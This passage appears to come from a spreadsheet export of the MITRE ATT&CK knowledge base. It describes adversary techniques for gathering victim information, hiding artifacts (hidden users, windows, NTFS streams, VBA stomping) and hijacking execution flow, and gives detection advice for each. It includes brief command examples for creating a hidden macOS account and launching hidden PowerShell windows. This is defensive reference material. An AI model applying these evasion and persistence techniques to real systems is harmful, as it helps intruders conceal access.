    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Determine Physical Locations</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information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[Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/001</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Business Tempo</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Roles</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/004</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1200</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>26 February 2020</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Content, File: File Creation, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden File System</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>28 June 2020</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</t>
  </si>
  <si>
    <t>File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Files and Directories</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls –a&lt;/code&gt; for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Users</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>31 July 2020</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>File: File Modification, User Account: User Account Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Window</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/003</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>Hide Artifacts: NTFS File Attributes</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/004</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Hide Artifacts: Run Virtual Instance</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.
If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Janantha Marasinghe; Menachem Shafran, XM Cyber</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>Hide Artifacts: VBA Stomping</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/007</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>File: File Content, Script: Script Execution</t>
  </si>
  <si>
    <t>Rick Cole, FireEye</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence, Privilege Escalation</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</si>
  <si>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
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Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
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Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>Hijack Execution Flow: COR_PROFILER</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Jesse Brown, Red Canary</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Side-Loading</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/002</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dylib Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with &lt;code&gt;@rpath&lt;/code&gt;, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt; function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. 
Run path dependent libraries can include &lt;code&gt;LC_LOAD_DYLIB&lt;/code&gt;, &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt;, and &lt;code&gt;LC_RPATH&lt;/code&gt;. Other special keywords are recognized by the macOS loader are &lt;code&gt;@rpath&lt;/code&gt;, &lt;code&gt;@loader_path&lt;/code&gt;, and &lt;code&gt;@executable_path&lt;/code&gt;.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the &lt;code&gt;otool -l&lt;/code&gt; command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)</t>
  </si>
  <si>
    <t>Application control</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; on Linux or &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the &lt;code&gt;export&lt;/code&gt; command, &lt;code&gt;setenv&lt;/code&gt; function, or &lt;code&gt;putenv&lt;/code&gt; function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s &lt;code&gt;os.environ&lt;/code&gt;.
On Linux, adversaries may set &lt;code&gt;LD_PRELOAD&lt;/code&gt; to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. &lt;code&gt;LD_PRELOAD&lt;/code&gt; can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by &lt;code&gt;LD_PRELOAD&lt;/code&gt; are loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) </t>
  </si>
  <si>
